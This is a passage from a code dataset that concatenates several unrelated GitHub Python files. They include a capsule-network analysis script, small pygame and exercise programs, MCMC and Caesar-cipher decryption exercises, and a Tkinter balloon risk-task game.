main()\n","repo_name":"SKajiwara/Jan2.2021.OneKattisADayChallenge","sub_path":"Parking/parking.py","file_name":"parking.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11383150235","text":"'''\nDiagnosing Colorectal Polyps in the Wild with Capsule Networks (D-Caps)\nOriginal Paper by Rodney LaLonde, Pujan Kandel, Concetto Spampinato, Michael B. Wallace, and Ulas Bagci\nPaper published at ISBI 2020: arXiv version (https://arxiv.org/abs/2001.03305)\nCode written by: Rodney LaLonde\nIf you use significant portions of this code or the ideas from our paper, please cite it :)\nIf you have any questions, please email me at lalonde@knights.ucf.edu.\n\nThis file is used for manipulating the vectors of the final layer of capsules (the D-Caps or diagnosis capsules).\nThis manipulation attempts to show what each dimension of these final vectors are storing (paying attention to),\nin terms of information about the positive input class.\nPlease see the README for further details about how to use this file.\n'''\n\nfrom __future__ import print_function\n\nimport os\nimport math\n\nimport SimpleITK as sitk\nfrom tqdm import tqdm, trange\nfrom PIL import Image\nimport numpy as np\nfrom keras import backend as K\nK.set_image_data_format('channels_last')\n\nfrom utils import safe_mkdir\nfrom model_helper import compile_model\n\n\ndef combine_images(generated_images, height=None, width=None):\n num = generated_images.shape[0]\n if width is None and height is None:\n width = int(math.sqrt(num))\n height = int(math.ceil(float(num)/width))\n elif width is not None and height is None: # height not given\n height = int(math.ceil(float(num)/width))\n elif height is not None and width is None: # width not given\n width = int(math.ceil(float(num)/height))\n\n shape = generated_images.shape[1:3]\n image = np.zeros((height*shape[0], width*shape[1]),\n dtype=generated_images.dtype)\n for index, img in enumerate(generated_images):\n i = int(index/width)\n j = index % width\n image[i*shape[0]:(i+1)*shape[0], j*shape[1]:(j+1)*shape[1]] = \\\n img[:, :, 0]\n return image\n\n\ndef manip(args, test_list, u_model):\n if args.test_weights_path == '':\n weights_path = os.path.join(args.check_dir, args.output_name + '_model_' + args.time + '.hdf5')\n else:\n weights_path = os.path.join(args.data_root_dir, args.test_weights_path)\n\n output_dir = os.path.join(args.data_root_dir, 'results', args.net)\n manip_out_dir = os.path.join(output_dir, 'manip_output')\n try:\n safe_mkdir(manip_out_dir)\n except:\n pass\n\n # Compile the loaded model\n manip_model = compile_model(args=args, uncomp_model=u_model)\n\n try:\n manip_model.load_weights(weights_path)\n except:\n raise NotImplementedError('Unable to find weights path.')\n\n\n # Manipulating capsule vectors\n print('Testing... This will take some time...')\n\n for i, img in enumerate(tqdm(test_list)):\n sitk_img = sitk.ReadImage(os.path.join(args.data_root_dir, 'imgs', img[0]))\n img_data = sitk.GetArrayFromImage(sitk_img)\n num_slices = img_data.shape[0]\n sitk_mask = sitk.ReadImage(os.path.join(args.data_root_dir, 'masks', img[0]))\n gt_data = sitk.GetArrayFromImage(sitk_mask)\n\n x, y = img_data[num_slices//2, :, :], gt_data[num_slices//2, :, :]\n x, y = np.expand_dims(np.expand_dims(x, -1), 0), np.expand_dims(np.expand_dims(y, -1), 0)\n\n noise = np.zeros([1, 512, 512, 1, 16])\n x_recons = []\n for dim in trange(16):\n for r in [-0.25, -0.125, 0, 0.125, 0.25]:\n tmp = np.copy(noise)\n tmp[:, :, :, :, dim] = r\n x_recon = manip_model.predict([x, y, tmp])\n x_recons.append(x_recon)\n\n x_recons = np.concatenate(x_recons)\n\n out_img = combine_images(x_recons, height=16)\n out_image = out_img * 4096\n out_image[out_image > 574] = 574\n out_image = out_image / 574 * 255\n\n Image.fromarray(out_image.astype(np.uint8)).save(os.path.join(manip_out_dir, img[0][:-4] + '_manip_output.png'))\n\n print('Done.')\n","repo_name":"lalonderodney/D-Caps","sub_path":"manip.py","file_name":"manip.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"36293168936","text":"import pygame\nimport math\n\ndef main():\n pygame.init()\n screen = pygame.display.set_mode((640, 480))\n baseLayer = pygame.Surface((640, 480))\n clock = pygame.time.Clock()\n screen.fill((0, 0, 0))\n\n isMouseDown = False\n prevX = -1\n prevY = -1\n currentX = -1\n currentY = -1\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1: \n isMouseDown = True\n currentX = event.pos[0]\n currentY = event.pos[1] \n prevX = event.pos[0]\n prevY = event.pos[1]\n\n if event.type == pygame.MOUSEBUTTONUP:\n if isMouseDown:\n isMouseDown = False\n baseLayer.blit(screen, (0, 0))\n\n if event.type == pygame.MOUSEMOTION:\n if isMouseDown:\n currentX = event.pos[0]\n currentY = event.pos[1]\n\n if isMouseDown and prevX != -1 and prevY != -1 and currentX != -1 and currentY != -1:\n screen.blit(baseLayer, (0, 0))\n center_x, center_y = calculateCenter(prevX, prevY, currentX, currentY)\n radius = math.sqrt((currentX-prevX)**2 + (currentY-prevY)**2)\n pygame.draw.polygon(screen, (255, 255, 255), [(center_x, center_y - radius), (center_x - math.sqrt(3)/2 * radius, center_y + radius/2), (center_x + math.sqrt(3)/2 * radius, center_y + radius/2)], 1)\n\n pygame.display.flip()\n clock.tick(60)\n\ndef calculateCenter(x1, y1, x2, y2):\n center_x = (x1 + x2) / 2\n center_y = (y1 + y2) / 2\n return center_x, center_y\n\nmain()\n","repo_name":"alikhanmurat/PP2","sub_path":"Lab9/Paint/eq. triangle.py","file_name":"eq. triangle.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16758235452","text":"import sys\n\n\ndef leftover():\n list = []\n for i in range(10):\n n = int(sys.stdin.readline().strip())\n list.append(n)\n s1 = set()\n for i in list:\n s1.add(i % 42)\n\n print(len(s1))\n\nleftover()","repo_name":"good5229/python-practice","sub_path":"3052.py","file_name":"3052.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36800403246","text":"import math\nimport json\nimport random\nfrom pathlib import Path\nfrom typing import Tuple\nimport cipher\nfrom custom_types import CountDict\nimport adjacent_letters\nimport alphabets\n\n\ndef load_json_from_file(filename: Path) -> CountDict:\n with open(filename) as f:\n content = f.read()\n stats = json.loads(content)\n return stats\n\n\nclass SubstitutionCipherMCMC:\n \"\"\"Provide class for performing decryption using MCMC with Metropolis-Hastings algorithm.\"\"\"\n\n def __init__(self, language_code):\n self.alphabets = alphabets.get(language_code)\n self.stats: CountDict = load_json_from_file(\n f\"letter_counts_{language_code}.json\"\n )\n\n def get_cipher_score(self, encrypted_text: str, cipher_text: str) -> float:\n \"\"\"Apply the cipher to the encrypted text and compute the probability of the\n decrypted text, given alphabet and statistics per defined language.\n\n Returns:\n float: Score, that is, unnormalized log probability of the decrypted text given certain\n language.\n \"\"\"\n decrypted_text = cipher.apply(encrypted_text, cipher_text, self.alphabets)\n counts_dict = adjacent_letters.get_count(decrypted_text, self.alphabets)\n score = 0.0\n for k, v in counts_dict.items():\n if k in self.stats:\n score += v * math.log(self.stats[k])\n return score\n\n def get_new_cipher_proposal(self, cipher_text: str) -> str:\n \"\"\"Propose a new cipher by switching the positions of two random letters in the cipher.\n\n Args:\n cipher_text (str): Cipher as a string.\n\n Returns:\n str: New cipher.\n \"\"\"\n cipher = list(cipher_text)\n pos1 = random.randint(0, len(cipher) - 1)\n pos2 = random.randint(0, len(cipher) - 1)\n if pos1 == pos2:\n return self.get_new_cipher_proposal(cipher_text)\n else:\n pos1_alpha = cipher[pos1]\n pos2_alpha = cipher[pos2]\n cipher[pos1] = pos2_alpha\n cipher[pos2] = pos1_alpha\n\n return \"\".join(cipher)\n\n def random_coin(self, p: float) -> bool:\n \"\"\"Toss a coin with probability of heads being p\"\"\"\n unif = random.uniform(0, 1)\n if unif >= p:\n return False\n else:\n return True\n\n def MCMC(\n self, encrypted_text: str, init: str, iters: int, logging: int = 500\n ) -> Tuple[str, float]:\n \"\"\"Try to decrypt encrypted text with metropolis-hastings algorithm.\n\n Args:\n encrypted_text (str): Text to decrypt.\n init (str): Initial cipher for the algorithm.\n iters (int): Number of iterations/samples.\n logging (int, optional): Display logging information every n iterations where\n logging specifies n.\n\n Returns:\n Tuple[str, float]: The most probable cipher, acceptance rate of the sampler.\n \"\"\"\n current_cipher = init\n best_cipher = init\n max_score = 0.0\n accepted = 0\n for i in range(iters):\n cipher_proposal = self.get_new_cipher_proposal(current_cipher)\n score_current_cipher = self.get_cipher_score(encrypted_text, current_cipher)\n score_proposed_cipher = self.get_cipher_score(\n encrypted_text, cipher_proposal\n )\n try:\n acceptance_probability = min(\n 1, math.exp(score_proposed_cipher - score_current_cipher)\n )\n except OverflowError:\n acceptance_probability = 1\n\n if score_current_cipher > max_score:\n best_cipher = current_cipher\n max_score = score_current_cipher\n if self.random_coin(acceptance_probability):\n current_cipher = cipher_proposal\n accepted += 1\n if logging and i % logging == 0:\n msg = self.log(encrypted_text, i, best_cipher, accepted)\n print(msg)\n return best_cipher, accepted / iters\n\n def log(self, encrypted_text, i, best_cipher, accepted):\n log_info = f\"Iteration: {i}\\nDecrypted text with best cipher so far: {cipher.apply(encrypted_text, best_cipher, self.alphabets)[0:60]}\\n\"\n if i > 0:\n log_info += f\"accept rate: {accepted/i:.2f}\\n\"\n return log_info\n","repo_name":"jjaakko/MCMC_cipher","sub_path":"MCMC.py","file_name":"MCMC.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45735055328","text":"#!/usr/bin/env python3\n\nimport random\nimport argparse\n\nclass Deck:\n suit_names = [\"Clubs\", \"Diamonds\", \"Hearts\", \"Spades\"]\n rank_names = [None, \"Ace\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\",\n \"8\", \"9\", \"10\", \"Jack\", \"Queen\", \"King\"]\n\n def __init__(self, n_cards = 52):\n self.deck = []\n while len(self.deck) < n_cards:\n for suit in range(4):\n for rank in range(1, 14):\n self.deck.append(Deck.rank_names[rank] + Deck.suit_names[suit])\n self.deck.append\n\n def shuffle(self):\n random.shuffle(self.deck)\n\n def deal_one_hand(self, n_cards = 5):\n hand = []\n for x in range(min(len(self.deck), n_cards)):\n hand.append(self.deck.pop()) \n return hand\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description=\"Deal card from deck of 52 cards\")\n parser.add_argument('--hands', type=int, help='number of hands to deal [1]', default = 1)\n parser.add_argument('--cards', type=int, help='cards per hand [5]', default = 5)\n\n cmdargs = parser.parse_args()\n hands = cmdargs.hands\n cards = cmdargs.cards\n\n deck = Deck()\n deck.shuffle()\n for hand in range(hands):\n print(deck.deal_one_hand(cards))\n","repo_name":"jreisinger/varia","sub_path":"deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39212066326","text":"#!/usr/bin/python\n# encoding: utf-8\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport time\n\nfrom workflow import Workflow3\nimport i18n\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndef parseTime(time):\n if time.isdigit():\n return \" \".join([time, i18n.dic['SECONDS']])\n\n table = {\n 's': i18n.dic['SECONDS'],\n 'sec': i18n.dic['SECONDS'],\n 'secs': i18n.dic['SECONDS'],\n 'second': i18n.dic['SECONDS'],\n 'seconds': i18n.dic['SECONDS'],\n 'm': i18n.dic['MINUTES'],\n 'min': i18n.dic['MINUTES'],\n 'mins': i18n.dic['MINUTES'],\n 'minute': i18n.dic['MINUTES'],\n 'minutes': i18n.dic['MINUTES'],\n 'h': i18n.dic['HOURS'],\n 'hour': i18n.dic['HOURS'],\n 'hours': i18n.dic['HOURS']\n }\n\n for expr in table:\n if time.endswith(expr):\n firstPart = time[:-(len(expr))]\n if firstPart.isdigit():\n return \" \".join([firstPart, table[expr]])\n\n return \"\"\n\ndef main(wffff):\n time_str = \"\"\n message = \"Time's up!\"\n\n if len(wf.args) == 0:\n wf.add_item(title = i18n.dic['TITLE_DEFAULT'], subtitle = i18n.dic['SUBTITLE_DEFAULT'], valid = True)\n else:\n time_str = parseTime(wf.args[0].strip())\n\n if len(wf.args) > 1:\n message = \" \".join(wf.args[1:])\n\n if len(time_str) > 0:\n wf.add_item(\n title = i18n.dic['TITLE_INPUT_DEFAULT'] % time_str,\n subtitle = i18n.dic['SUBTITLE_INPUT_DEFAULT'] % message,\n arg = ' '.join(wf.args),\n valid = True)\n else:\n wf.add_item(title = i18n.dic['ERR_TITLE_DEFAULT'], subtitle = i18n.dic['ERR_SUBTITLE_DEFAULT'], valid = True)\n\n wf.send_feedback()\n\nif __name__ == '__main__':\n wf = Workflow3()\n sys.exit(wf.run(main))","repo_name":"luoweihua7/timer-workflow","sub_path":"src/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12219653999","text":"import random\nimport tkinter as tk\nfrom PIL import Image, ImageTk\n#import winsound\nimport time\nfrom playsound import playsound\nimport sys\nfrom tkinter import ttk\n\n\nclass BalloonAnalogueRiskTask:\n def __init__(self, master, user):\n self.master = master\n self.user = user\n # setup game relevant data\n self.print_to_console = True\n self.csv_file = open(\"log.csv\", \"a+\", buffering=1)\n self.csv_file.write(f\"timestamp, user, event, nr_ballons, pumps, overall_money, pump_probability, burst_chance\\n\")\n self.score = 0\n self.pumps = 0\n self.nr_balloons = 30\n self.max_pumps = 50 # maximum number of pumps\n self.game_over = False\n self.start_budget = 1500 #initial money\n self.budget = 1500 - 50 #current money\n self.pump_embursment_sum = 0 # temp variable to store the embursment sum\n self.pump_embursment = 1 #how much is added for each pump\n self.punishment = 50 #how much money is substracted for each balloon\n self.budget = self.start_budget - self.punishment #current money\n \n # get height and width of current window\n self.width = self.master.winfo_screenwidth()\n self.height = self.master.winfo_screenheight()\n # create the frame for the ballon: \n self.ballon_frame_w = self.width*0.7\n self.ballon_frame_h = self.height*0.7\n self.ballon_frame = tk.Frame(self.master, width=self.ballon_frame_w, height=self.ballon_frame_h)\n self.ballon_frame.configure(bg='white') \n # create the frame for the button\n self.button_frame_w = self.ballon_frame_w\n self.button_frame_h = self.height*0.3\n self.button_frame = tk.Frame(self.master, width=self.button_frame_w, height=self.button_frame_h) \n # create the frame for the bar\n self.bar_frame_w = self.width*0.2\n self.bar_frame_h = self.ballon_frame_h\n self.bar_frame = tk.Frame(self.master, width=self.bar_frame_w, height=self.bar_frame_h)\n \n self.title_frame = tk.Frame(self.master, width=self.width, height=self.height*0.2)\n self.title_frame.grid(row=0, column=1)\n \n self.left_buffer_frame = tk.Frame(self.master)\n \n self.bar_frame.grid(row=1, column=0)\n self.ballon_frame.grid(row=1, column=1)\n self.button_frame.grid(row=2, column=1)\n self.left_buffer_frame.grid(row=1, column=2)\n \n #self.title_frame = tk.Frame(self.master, width=self.width, height=self.height*0.2)\n #elf.title_canvas = tk.Canvas(self.title_frame, width=self.width, height=self.height*0.2)\n #self.title_canvas.pack()\n #self.title_frame.grid(row=0, column=0)\n #self.max_money_label = tk.Label(self.title_frame, text=\"Max Money: 1500\", font=(\"Arial\", 12))\n #self.max_money_label.grid(row=0, column=0, pady=10)\n #self.max_money_label.config(text=\"Max Money: {}\".format(self.start_budget))\n #self.title_label = tk.Label(self.title_frame, text=\"Balloon Game\", font=(\"Arial\", 12))\n \n #self.title_label.grid(row=0, column=0)\n \n # setup the title\n self.title_canvas = tk.Canvas(self.title_frame, width=self.ballon_frame_w, height=self.height*0.1)\n self.title_canvas.pack()\n self.score_label = tk.Label(self.title_canvas, text=\"Score: 0\", font=(\"Arial\", 12))\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n self.title_canvas.create_window(100, 100, window=self.score_label) \n self.max_money_label = tk.Label(self.title_canvas, text=\"Max Money: 1500\", font=(\"Arial\", 12))\n self.max_money_label.config(text=\"Max Money: {}\".format(self.start_budget))\n self.title_canvas.create_window(300, 100, window=self.max_money_label) \n self.tries_label = tk.Label(self.title_canvas, text=\"Balloons Left: {}\".format(self.nr_balloons), font=(\"Arial\", 12))\n self.tries_label.config(text=\"Balloons Left: {}\".format(self.nr_balloons))\n self.title_canvas.create_window(500, 100, window=self.tries_label) \n self.pumps_label = tk.Label(self.title_canvas, text=\"Pumps: 0\", font=(\"Arial\", 12))\n self.title_canvas.create_window(700, 100, window=self.pumps_label) \n \n # setup the buttons \n self.button_canvas = tk.Canvas(self.button_frame, width=self.button_frame_w, height=self.button_frame_h)\n self.button_canvas.pack()\n self.pump_button = tk.Button(self.button_frame, text=\"Pump\", font=\"Helvetica 20 bold\", command=self.pump)\n self.button_canvas.create_window(self.button_frame_w*0.1, self.button_frame_h*0.08, window=self.pump_button)\n self.checkout_button = tk.Button(self.button_frame, text=\"Collect CHF\", font=\"Helvetica 20 bold\", command=self.checkout)\n self.button_canvas.create_window(self.button_frame_w*0.9, self.button_frame_h*0.08, window=self.checkout_button)\n \n \n \"\"\"\n self.score_label = tk.Label(self.button_frame, text=\"Score: 0\", font=(\"Arial\", 12))\n self.score_label.grid(row=1, column=0, pady=10)\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n \n self.max_money_label = tk.Label(self.button_frame, text=\"Max Money: 1500\", font=(\"Arial\", 12))\n self.max_money_label.grid(row=0, column=0, pady=10)\n self.max_money_label.config(text=\"Max Money: {}\".format(self.start_budget))\n \n self.tries_label = tk.Label(self.button_frame, text=\"Balloons Left: {}\".format(self.nr_balloons), font=(\"Arial\", 12))\n self.tries_label.grid(row=1, column=1, pady=10)\n self.tries_label.config(text=\"Balloons Left: {}\".format(self.nr_balloons))\n\n self.pumps_label = tk.Label(self.button_frame, text=\"Pumps: 0\", font=(\"Arial\", 12))\n self.pumps_label.grid(row=2, column=0, pady=10)\n \n self.instructions = tk.Label(self.button_frame, text=\"Click the pump button to inflate the balloon\", font=(\"Arial\", 12))\n self.instructions.grid(row=3, column=0, pady=10)\n self.checkout_button = tk.Button(self.button_frame, text=\"Collect CHF\", font=(\"Arial\", 12), command=self.checkout)\n self.checkout_button.grid(row=4, column=1, pady=10)\n \"\"\"\n \n \n # setup the balloon\n self.ballon_background = tk.Canvas(self.ballon_frame, width=self.ballon_frame_w, height=self.ballon_frame_h, bg=\"white\")\n img = Image.open(\"balloon.jpg\")\n self.img_baseheight = int(self.ballon_frame_h*0.1)\n hpercent = (self.img_baseheight/float(img.size[1]))\n wsize = int((float(img.size[0])*float(hpercent)))\n img = img.resize((wsize, self.img_baseheight), Image.Resampling.LANCZOS)\n #img.thumbnail((self.img_baseheight,self.img_baseheight), Image.Resampling.LANCZOS)\n #wpercent = (self.img_basewidth/float(img.size[0]))\n #hsize = int((float(img.size[1])*float(wpercent)))\n #img = img.resize((self.img_basewidth,hsize), Image.Resampling.LANCZOS)\n self.balloon_image = ImageTk.PhotoImage(img)\n self.balloon_label = tk.Label(self.ballon_frame, image=self.balloon_image, borderwidth=0)\n self.balloon_label.grid(row=0, column=0, padx=20)\n self.ballon_background.grid(row=0, column=0)\n \n # setup the moving bar\n self.bar = tk.Canvas(self.bar_frame, width=self.bar_frame_w, height=self.bar_frame_h)\n self.bar.pack()\n self.bar.create_rectangle(self.bar_frame_w*0.4, 0.1*self.bar_frame_h, 0.6*self.bar_frame_w, 0.9*self.bar_frame_h, fill=\"white\", outline=\"black\")\n self.moving_bar = self.bar.create_rectangle(self.bar_frame_w*0.4, 0.0*self.bar_frame_h, 0.6*self.bar_frame_w, 0.0*self.bar_frame_h, fill=\"light blue\")\n self.bar.tag_raise(self.moving_bar)\n # to move the bar up (self.bar_frame_w*0.6, 0.1*self.bar_frame_h, 0.4*self.bar_frame_w, self.bar_frame_h) => bar is at the top\n # bar at the bottom: (self.bar_frame_w*0.4, 0.1*self.bar_frame_h, 0.6*self.bar_frame_w, 0.1*self.bar_frame_h) => bar is at bottom\n self.moving_bar_h = 0.9*self.bar_frame_h\n self.bar.coords(self.moving_bar, (self.bar_frame_w*0.4, 0.9*self.bar_frame_h, 0.6*self.bar_frame_w, 0.9*self.bar_frame_h))\n self.pump_dist = (0.9*self.bar_frame_h - 0.1*self.bar_frame_h)/50\n self.bar.create_text(0.5*self.bar_frame_w, 0.05*self.bar_frame_h, text=\"Potential Losses for this Balloon\", fill=\"black\", font=('Helvetica 12 bold'))\n self.bar.create_text(0.5*self.bar_frame_w, 0.08*self.bar_frame_h, text=\"(-50 to 0)\", fill=\"black\", font=('Helvetica 12 bold'))\n self.moving_bar_text = self.bar.create_text(0.3*self.bar_frame_w, 0.9*self.bar_frame_h, text=f\"{-self.punishment}\", fill=\"black\", font=('Helvetica 12 bold'))\n #self.bar_title = tk.Label(self.bar, text=\"Potential Losses for this Balloon\", font=(\"Arial\", 14))\n #self.bar_title.grid(row=0, column=0)\n self.log_csv(\"game_start\")\n \n def log(self, msg):\n if self.print_to_console:\n print(f\"[*] {msg}\")\n self.log_file.write(msg)\n self.log_file.flush()\n \n def log_csv(self, event, prob=\"\", burst_chance=\"\"):\n # timestamp, event, nr_ballons, pumps, overall_money, pump_probability, burst_chance\\n\n if self.print_to_console:\n print(f\"[*] {time.time()},{self.user},{event},{self.nr_balloons},{self.pumps},{self.budget},{prob},{burst_chance}\")\n self.csv_file.write(f\"{time.time()},{self.user},{event},{self.nr_balloons},{self.pumps},{self.budget},{prob},{burst_chance}\\n\") \n self.csv_file.flush()\n \n def burst_chance(self):\n return 1 / (self.max_pumps - self.pumps + 1)\n \n def pump_ballon(self):\n img = Image.open(\"balloon.jpg\")\n self.img_baseheight = int(self.ballon_frame_h*0.1+(self.ballon_frame_h*0.8/self.max_pumps*self.pumps))\n hpercent = (self.img_baseheight/float(img.size[1]))\n wsize = int((float(img.size[0])*float(hpercent)))\n img = img.resize((wsize, self.img_baseheight), Image.Resampling.LANCZOS)\n self.balloon_image = ImageTk.PhotoImage(img)\n self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n \n def reset_ballon(self):\n img = Image.open(\"balloon.jpg\")\n self.img_baseheight = int(self.ballon_frame_h*0.1)\n hpercent = (self.img_baseheight/float(img.size[1]))\n wsize = int((float(img.size[0])*float(hpercent)))\n img = img.resize((wsize, self.img_baseheight), Image.Resampling.LANCZOS)\n self.balloon_image = ImageTk.PhotoImage(img)\n self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n \n def reset_bar(self, max_punish=False):\n self.bar.coords(self.moving_bar, (self.bar_frame_w*0.4, 0.0*self.bar_frame_h, 0.6*self.bar_frame_w, 0.0*self.bar_frame_h))\n self.bar.coords(self.moving_bar_text, (0.3*self.bar_frame_w, 0.9*self.bar_frame_h))\n if max_punish:\n self.bar.itemconfig(self.moving_bar_text, text=f\"{-self.punishment}\")\n else:\n self.bar.itemconfig(self.moving_bar_text, text=f\"{-self.punishment+self.pumps}\")\n \n def pump_bar(self):\n # min height = 0.1*self.bar_frame_h\n # max height = 0.9*self.bar_frame_h\n # 0.8*self.bar_frame_h / self.max_pumps * self.pumps\n self.bar.coords(self.moving_bar, (self.bar_frame_w*0.4, 0.9*self.bar_frame_h-(0.8*self.bar_frame_h / self.max_pumps * self.pumps), 0.6*self.bar_frame_w, 0.9*self.bar_frame_h))\n self.bar.coords(self.moving_bar_text, (0.3*self.bar_frame_w, 0.9*self.bar_frame_h-(0.8*self.bar_frame_h / self.max_pumps * self.pumps)))\n self.bar.itemconfig(self.moving_bar_text, text=f\"{-self.punishment+self.pumps}\")\n \n def checkout(self):\n self.log_csv(f\"checkout\")\n playsound('casino.wav', False)\n self.nr_balloons = self.nr_balloons - 1\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n self.tries_label.config(text=\"Balloons Left: {}\".format(self.nr_balloons))\n if self.nr_balloons == 0:\n self.log_csv(f\"game over\")\n self.game_over = True\n self.pump_button.config(text=\"Game Over\", state=\"disabled\")\n self.checkout_button.config(text=\"Game Over\", state=\"disabled\")\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n else:\n self.pump_button.config(text=\"Checked Out\", state=\"disabled\")\n self.checkout_button.config(text=\"Checked Out\", state=\"disabled\")\n self.ballon_frame.after(1000, self.reset)\n #self.reset()\n \n def pump(self):\n if self.game_over:\n return\n \n #winsound.PlaySound(\"inflate.wav\", winsound.SND_ASYNC)\n playsound('inflate.wav', False)\n # TODO: implement backup\n self.pumps += 1\n self.pump_embursment_sum += 1\n self.budget = self.budget + self.pump_embursment\n self.pumps_label.config(text=\"Pumps: {}\".format(self.pumps))\n \n prob = random.random()\n b_chance = self.burst_chance()\n burst = prob < b_chance\n self.log_csv(f\"ballon pumped\", prob=prob, burst_chance=b_chance)\n if burst:\n self.log_csv(f\"ballon burst\", prob=prob, burst_chance=b_chance)\n self.reset_bar(max_punish=True)\n playsound('explosion.wav', False)\n popped_img = Image.open(\"poppedballoon.jpg\")\n self.img_baseheight = int(self.ballon_frame_h*0.1+(self.ballon_frame_h*0.8/self.max_pumps*self.pumps))\n hpercent = (self.img_baseheight/float(popped_img.size[1]))\n wsize = int((float(popped_img.size[0])*float(hpercent)))\n popped_img = popped_img.resize((wsize, self.img_baseheight), Image.Resampling.LANCZOS)\n self.balloon_image = self.balloon_image = ImageTk.PhotoImage(popped_img)\n self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n self.budget = self.budget - self.pump_embursment_sum\n self.nr_balloons = self.nr_balloons - 1\n self.tries_label.config(text=\"Balloons Left: {}\".format(self.nr_balloons))\n if self.nr_balloons == 0:\n self.game_over = True\n self.log_csv(f\"game over\")\n self.pump_button.config(text=\"Game Over\", state=\"disabled\")\n self.checkout_button.config(text=\"Game Over\", state=\"disabled\")\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n else:\n #winsound.PlaySound(\"explosion.wav\", winsound.SND_ASYNC)\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n self.pump_button.config(text=\"Popped\", state=\"disabled\")\n self.checkout_button.config(text=\"Popped\", state=\"disabled\")\n self.ballon_frame.after(2000, self.reset)\n #self.pump_button.config(text=\"Game Over\", state=\"disabled\")\n else: \n self.pump_ballon()\n self.pump_bar()\n if self.pumps == self.max_pumps:\n self.log_csv(f\"max pumps reached\")\n self.checkout()\n else:\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n #self.balloon_image = ImageTk.PhotoImage(Image.open(\"balloon.jpg\").resize((int(100 * self.balloon_size), int(100 * self.balloon_size))))\n #self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n\n def reset(self):\n self.pumps = 0\n self.pump_embursment_sum = 0\n self.budget = self.budget - self.punishment\n self.score_label.config(text=\"Score: {}\".format(self.budget))\n self.pumps_label.config(text=\"Pumps: {}\".format(self.pumps))\n #self.balloon_image = ImageTk.PhotoImage(Image.open(\"balloon.jpg\").resize((100, 100)))\n #self.balloon_label.config(image=self.balloon_image, borderwidth=0)\n self.pump_button.config(text=\"Pump\", state=\"active\")\n self.checkout_button.config(text=\"Collect CHF\", state=\"active\")\n self.reset_bar()\n self.reset_ballon()\n self.log_csv(f\"new balloon\")\n\n \nuser = sys.argv[1]\nroot = tk.Tk()\n#root.configure(bg='white')\nroot.title('Ballon Game')\nscreenWidth = root.winfo_screenwidth()\nscreenHeight = root.winfo_screenheight() \nroot.minsize(width=screenWidth, height=screenHeight)\n#root.attributes('-fullscreen', True)\napp = BalloonAnalogueRiskTask(root, user)\nroot.mainloop()\n","repo_name":"philippmao/bart","sub_path":"BART.py","file_name":"BART.py","file_ext":"py","file_size_in_byte":16520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41429667290","text":"from collections import Counter\nimport matplotlib.pyplot as plt\n\nprobability={'a':.08167,'b':.01492,'c':.02782,'d':.04253,'e':.12702,'f':.02228,'g':.02015,\n 'h':.06094,'i':.06966,'j':0.00153,'k':0.00772,'l':.04025,'m':.02406,'n':.06749,\n 'o':.07507,'p':.01929,'q':0.00095,'r':.05987,'s':.06327,'t':.09056,'u':.02758,\n 'v':0.00978,'w':.02360,'x':0.00150,'y':.01974,'z':0.00074}\n\ndef distance(key, encrypted_str):\n squared_dist=0\n encrypted_string=''\n for i in range(len(encrypted_str)):\n encrypted_string+=chr(((ord(encrypted_str[i])-ord('a'))-key)%26+97)\n count = Counter(encrypted_string)\n encrypted_string=list(encrypted_string)\n text_length=len(encrypted_string)\n #unique characters\n encrypted_string=set(encrypted_string)\n unique_chars=len(encrypted_string)\n\n for i in range(unique_chars):\n chars = encrypted_string.pop()\n squared_dist+= (text_length * probability[chars] - count[chars]) ** 2\n return squared_dist\n\ndef Mapping(encrypted_org1):\n encrypted_string = ''\n for i in range(len(encrypted_org1)):\n if ord(encrypted_org1[i]) >= 97 and ord(encrypted_org1[i]) <= 122:\n encrypted_string = encrypted_string + chr(((ord(encrypted_org1[i]) - ord('a')) - shift_key) % 26 + 97)\n else:\n encrypted_string += encrypted_org1[i]\n return encrypted_string\n\n\nencrypted_file=open('ceaser_cipher.txt','r')\norginal_encrypted=encrypted_file.read().lower()\norg_encrypted_cpy=orginal_encrypted\norginal_encrypted=list(orginal_encrypted)\nstop_chars={' ', '.', ','}\norginal_encrypted = [element for element in orginal_encrypted if element not in stop_chars]\n\n#relative_frequency histogram of the characters\norginal_encrypted.sort()\nplt.hist(orginal_encrypted)\nplt.xlabel('Character')\nplt.ylabel('Count')\nplt.show()\n\nMIN=1000000000000000000\nshift_key=0\n\nfor i in range(26):\n squared_distance=distance(i, orginal_encrypted)\n if(squared_distance PRINT_FREQ:\n print('it {:d} -- loss 